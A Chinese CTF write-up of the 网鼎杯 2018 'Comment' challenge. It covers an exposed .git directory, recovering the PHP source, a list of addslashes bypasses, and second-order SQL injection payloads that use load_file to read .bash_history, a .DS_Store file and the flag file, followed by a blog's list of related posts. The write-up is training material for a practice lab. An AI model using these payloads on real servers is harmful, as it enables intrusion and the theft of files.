[网鼎杯 2018]Comment

又遇到了一道有意思的题目,还是比较综合的,考的跟之前有一道很相像,用的还是二次注入。

因为找不到登陆点的sql注入,所以扫了一下源码,发现是存在git泄露的。

[21:03:10] Starting:
[21:03:10] 301 - 388B - /.git -> http://72f9009e-83ae-410a-8849-6cf1c2f44fe2.node3.buuoj.cn/.git/
[21:03:10] 200 - 23B - /.git/HEAD
[21:03:10] 200 - 145B - /.git/index
[21:03:10] 200 - 92B - /.git/config
[21:03:10] 200 - 73B - /.git/description
[21:03:12] 403 - 323B - /.git/
[21:03:13] 200 - 7KB - /index.php
[21:03:13] 200 - 2KB - /login.php
[21:03:20] 429 - 568B - /phpmyadmin/
[21:03:20] 429 - 568B - /phpMyAdmin/

到kali下面利用githack找一下git文件python GitHacker.py http://72f9009e-83ae-410a-8849-6cf1c2f44fe2.node3.buuoj.cn/.git

cat一下发现源代码是不全的,所以接下来应该修复一手:

到生成文件的目录:git log --relog

得到继续:git reset --hard e5b2a2443c2b6d395d06960123142bc91123148c

这样我们就得到了如下代码:

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);
header("Location: ./index.php");
break;
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>

到了登陆界面,其实刚开始没理解,直接就照着提示把三个*全都打进去了,结果发现是要替换的,直接burp跑一波就ok了。

此时就是看着源码进行sql注入了,他是加了一个addslashes进行过滤准备的,但是有的时候addslash也是一个能造成漏洞的点。

$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";

addslash:

gbk导致宽字节注入
使用icon,mb_convert_encoding转换字符编码函数导致宽字节注入
url解码导致绕过addslashes
base64解码导致绕过addslashes
json编码导致绕过addslashes
没有使用引号保护字符串,直接无视addslashes
stripslashes(去掉了\)
字符替换导致的绕过addslashes

这里分成了两个功能模块,一个是发帖,另一个是评论,两个功能。

两个地方都利用到了addslash进行转义,但是都仅仅对于输入进行转义,对于输出没有进行转义,这就有可能造成二次注入,在mysql中,addslash添加的反斜杠是能够起作用的,即\'在表里面value值就是'的意义,那么我们拿出来的时候就可以进行闭合了。

同时闭合了单引号之后我们还需要,注释,因为#号只能适用于单行的注释,对于多行的注释我们使用/**/从而进行拼接的注释,所以在我们注册完成后,我们在comment处这么写*/#那么拼接起来就是:

insert into comment
set category = ' ',content=user(),/*',
content = '*/#',
bo_id = '$bo_id'";

完成了二次注入。

之后我们利用文件的读取,load_file函数.

payload:',content=(select(load_file("/home/www/.bash_history"))),/*

output:

cd /tmp/ unzip html.zip rm -f html.zip cp -r html /var/www/ cd /var/www/html/ rm -f .DS_Store service apache2 start

这里的具体步骤是:

切换到/tmp目录下解压html压缩包
​删除压缩包,
将html复制到var/www/目录下,
切换到/var/www/html目录,
删除.Ds_Store.
启动apache服务
但是这里我们发现一个问题,他没有删除/tmp/html目录下的.Ds_Store文件,所以我们可以尝试i读取,(信息泄露)
123',content=(select load_file('/tmp/html/.Ds_Store')),/*

无显示,用hex编码显示

',content=(select hex(load_file("/tmp/html/.DS_Store"))),/* 得到:flag_8946e1ff1ee3e40f.php文件

',content=(select hex(load_file("/tmp/html/flag_8946e1ff1ee3e40f.php"))),/*

得到:

3C3F7068700A24666C6167203D2027666C61677B66396361316136622D396437382D313165382D393061332D6334623330316237623939627D273B0A3F3E0A

解码发现不对:

',content=(select hex(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php"))),/*

再次读取:

',content=(select hex(load_file("/var/www/html/flag_8946e1ff1ee3e40f.php"))),/*

[网鼎杯 2018]Comment的更多相关文章

  1. [网鼎杯 2018]Comment-1|SQL注入|二次注入

    1.打开之后只有一个留言页面,很自然的就想到了二次注入得问题,顺带查看了下源代码信息,并没有什么提示,显示界面如下: 2.那先扫描一下目录,同时随便留言一个测试以下,但是显示需要登录,账户.密码给出了 ...

  2. 【网鼎杯2018】fakebook

    解题过程: 首先进行目录扫描,发现以下目录: user.php.bak login.php flag.php user.php robots.txt user.php.bak猜测存在源码泄露. 查看源 ...

  3. 刷题 [网鼎杯 2018]Fakebook

    解题思路 首先登陆页面发现是这样的: 查看源码 源码很正常,也没有什么特别的 web目录扫描 我用的是dirmap工具扫描,扫描结果保存在一个txt文件中,结果可知没什么后台. robots.txt ...

  4. [原题复现+审计][网鼎杯 2018] WEB Fakebook(SSRF、反序列化、SQL注入)

    简介  原题复现:  考察知识点:SSRF.反序列化.SQL注入  线上平台:https://buuoj.cn(北京联合大学公开的CTF平台) 榆林学院内可使用信安协会内部的CTF训练平台找到此题 过 ...

  5. [网鼎杯2018]Unfinish-1|SQL注入|二次注入

    1.进入题目之后只有一个登录界面,检查源代码信息并没有发现有用的信息,尝试万能密码登录也不行,结果如下: 2.进行目录扫描,发现了注册界面:register.php,结果如下: 3.那就访问注册界面, ...

  6. CTF-i春秋网鼎杯第四场部分writeup

    CTF-i春秋网鼎杯第四场部分writeup 因为我们组的比赛是在第四场,所以前两次都是群里扔过来几道题然后做,也不知道什么原因第三场的题目没人发,所以就没做,昨天打了第四场,简直是被虐着打. she ...

  7. CTF-i春秋网鼎杯第二场misc部分writeup

    CTF-i春秋网鼎杯第二场misc部分writeup 套娃 下载下来是六张图片 直接看并没有什么信息 一个一个查看属性 没有找到有用信息 到winhexv里看一下 都是标准的png图片,而且没有fla ...

  8. CTF-i春秋网鼎杯第一场misc部分writeup

    CTF-i春秋网鼎杯第一场misc部分writeup 最近因为工作原因报名了网鼎杯,被虐了几天后方知自己还是太年轻!分享一下自己的解题经验吧 minified 题目: 一张花屏,png的图片,老方法, ...

  9. 刷题记录:[网鼎杯]Fakebook

    目录 刷题记录:[网鼎杯]Fakebook 一.涉及知识点 1.敏感文件泄露 2.sql注入 二.解题方法 刷题记录:[网鼎杯]Fakebook 题目复现链接:https://buuoj.cn/cha ...

随机推荐

  1. Shell编程—数据展示

    1.标准文件描述符 Linux用文件描述符(file descriptor)来标识每个文件对象.文件描述符是一个非负整数,可以唯一标识会话中打开的文件.每个进程一次 多可以有九个文件描述符.出于特殊目 ...

  2. muduo源码解析10-logstream类

    FixedBuffer和logstream class FixedBuffer:noncopyable { }: class logstream:noncopyable { }: 先说一下包含的头文件 ...

  3. ASP.NET Core3.1使用IdentityServer4中间件系列随笔(五):创建使用[Code-授权码]授权模式的客户端

    配套源码:https://gitee.com/jardeng/IdentitySolution 本篇将创建使用[Code-授权码]授权模式的客户端,来对受保护的API资源进行访问. 1.接上一篇项目, ...

  4. Kafka 0.10.1版本源码 Idea编译

    Kafka 0.10.1版本源码 Idea编译 1.环境准备 Jdk 1.8 Scala 2.11.12:下载scala-2.11.12.msi并配置环境变量 Gradle 5.6.4: 下载Grad ...

  5. Java高级特性——反射机制(第一篇)

    ——何为动态语言,何为静态语言?(学习反射知识前,需要了解动态语言和静态语言) 动态语言 >是一类在运行时可以改变其结构的语言,例如新的函数.对象.甚至是代码可以被引进,已有的函数可以被删除或者 ...

  6. 百度支持链接的nofollow属性吗

    http://www.wocaoseo.com/thread-269-1-1.html 简单明确的一个问题,百度目前支持链接的nofollow属性吗?rel='external nofollow' 复 ...

  7. akka-grpc - 应用案例

    上期说道:http/2还属于一种不算普及的技术协议,可能目前只适合用于内部系统集成,现在开始大面积介入可能为时尚早.不过有些项目需求不等人,需要使用这项技术,所以研究了一下akka-grpc,写了一篇 ...

  8. MarkDown编辑器中改变文本字体颜色大小

    法一 有点类似前端里 <font face="微软雅黑" size=4 color=red>输入的文字</font> 其中 face对应字体 size 大小 ...

  9. AD18使用原理图优先选项( Preference)调整原理图纸张大小失效问题解决

    1.创建新的原理图纸后,在当前点击更改并不会生效 2.想要生效需要去原理图纸的文档详细属性中更新即可生效!以下两种方式可以打开文档选项按钮. a.O->D 打开文档选项 b.右下角选择Prope ...

  10. 【Android】AndroidStudio关于EventBus报错解决方法its super classes have no public methods with the @Subscribe

    作者:程序员小冰,GitHub主页:https://github.com/QQ986945193 新浪微博:http://weibo.com/mcxiaobing 首先说明,以前我用eventBus的 ...